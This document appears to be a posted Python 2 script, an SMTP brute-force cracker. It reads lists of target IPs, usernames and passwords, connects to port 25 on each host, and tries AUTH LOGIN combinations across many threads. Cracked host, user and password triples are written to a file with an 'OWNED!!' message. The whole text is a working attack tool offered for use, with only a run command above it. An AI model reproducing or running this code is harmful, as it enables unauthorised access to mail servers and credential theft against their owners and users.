May 25, 2022 at 8:44 AM
Run Command :- python smtp.py 100 bad d3
import socket, sys, base64, Queue, threading
if str(sys.argv[1]) == 'a':
ux = open('ips.txt','a')
uy = open('users.txt','a')
uw = open('pass.txt','a')
sys.exit(1)
ThreadNumber = sys.argv[1]
Verbose = str(sys.argv[2])
Dbg = str(sys.argv[3])
bad = open('bad.txt','w')
val = open('valid.txt','a')
cracked = []
with open('valid.txt','rU') as vff: alreadycracked = vff.read().splitlines()
if len(alreadycracked) > 0:
for bruted in alreadycracked:
cracked.append(bruted.split(" ")[0])
with open('subs.txt','rU') as sf: subs = sf.read().splitlines()
def GetDomainFromBanner(banner):
if banner.startswith("220 "): TempBanner = banner.split(" ")[1]
if banner.startswith("220-"): TempBanner = banner.split(" ")[0].split("220-")[1]
FirstDomain = TempBanner.rstrip()
for sd in subs:
if FirstDomain.endswith(sd):
LastDomain = FirstDomain.split(".")[-3]+"."+FirstDomain.split(".")[-2]+"."+FirstDomain.split(".")[-1]
return LastDomain
LastDomain = FirstDomain.split(".")[-2]+"."+FirstDomain.split(".")[-1]
return LastDomain
class Apophis(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
Host,user,passwd = self.queue.get()
self.checker(Host,user,passwd)
self.queue.task_done()
def checker(self,host,user,Passwd):
try:
if host in str(cracked): return False
S = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
S.setblocking(0)
S.settimeout(15)
S.connect((host,25))
banner = S.recv(1024)
if banner[:3] != '220':
S.close()
return False
S.send('EHLO User
')
data = S.recv(2048)
if '250' not in data:
S.send('QUIT
')
S.recv(512)
S.close()
return False
dom = GetDomainFromBanner(banner)
userd = user+"@"+dom
for pwd in Passwd.split("|"):
pwd2 = pwd
if "%user%" in pwd: pwd2 = pwd.replace("%user%",user)
if "%User%" in pwd: pwd2 = pwd.replace("%User%",user.title())
S.send('RSET
')
data = S.recv(256)
S.send('AUTH LOGIN
')
data = S.recv(256)
if data[:3] != '334':
S.send('QUIT
')
S.recv(512)
S.close()
return False
if Dbg == "d1" or Dbg == "d3": print "
[+]Trying " + host + " " + userd + " " + pwd2+' '
S.send(base64.b64encode(userd.rstrip()) + '
')
data = S.recv(256)
S.send(base64.b64encode(pwd2) + '
')
data = S.recv(256)
if data[:3] == '235': break
if data[:3] != '235':
if Verbose == 'bad':
bad.write(host+'
')
bad.flush()
S.send('QUIT
')
S.recv(512)
return False
return False
if Dbg == "d4": print "
OWNED!! -> ",host,userd.rstrip(),pwd2
val.write(host+' '+userd+' '+pwd2+'
')
val.flush()
cracked.append(host)
S.send('QUIT
')
S.recv(512)
return True
except socket.error:
return False
except Exception, e:
if Dbg == "d2" or Dbg == "d3": print host,e
return False
def main(users,passwords,ThreadNmber):
queue = Queue.Queue(maxsize=40000)
for i in range(ThreadNmber):
try:
t = Apophis(queue)
t.daemon = True
t.start()
except Exception, e:
print "Couldn't start",ThreadNmber,"Threads! Started",i,"instead!"
break
for passwd in passwords:
for user in users:
with open('ips.txt','rU') as hosts:
for Host in hosts:
queue.put((Host.rstrip(),user,passwd))
queue.join()
if __name__ == "__main__":
with open('users.txt','rU') as uf: users = uf.read().splitlines()
with open('pass.txt','rU') as pf: passwords = pf.read().splitlines()
main(users,passwords,int(ThreadNumber))